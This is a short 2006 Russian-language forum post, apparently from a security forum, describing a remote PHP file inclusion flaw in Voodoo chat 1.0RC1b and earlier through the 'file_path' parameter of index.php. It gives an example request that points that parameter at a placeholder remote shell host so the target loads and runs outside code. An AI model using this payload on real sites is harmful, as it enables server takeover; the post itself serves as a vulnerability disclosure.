
02.08.2006, 03:45
|
|
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
Провел на форуме: 9751364
Репутация:
1847
|
|
PHP-инклюдинг в Voodoo chat
Программа: Voodoo chat 1.0RC1b и предыдущих
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "file_path" в сценарии index.php.
Пример:
http://sitename.com/[ScriptPath]/index.php?file_path=http://SHELLURL.COM?
|
|
|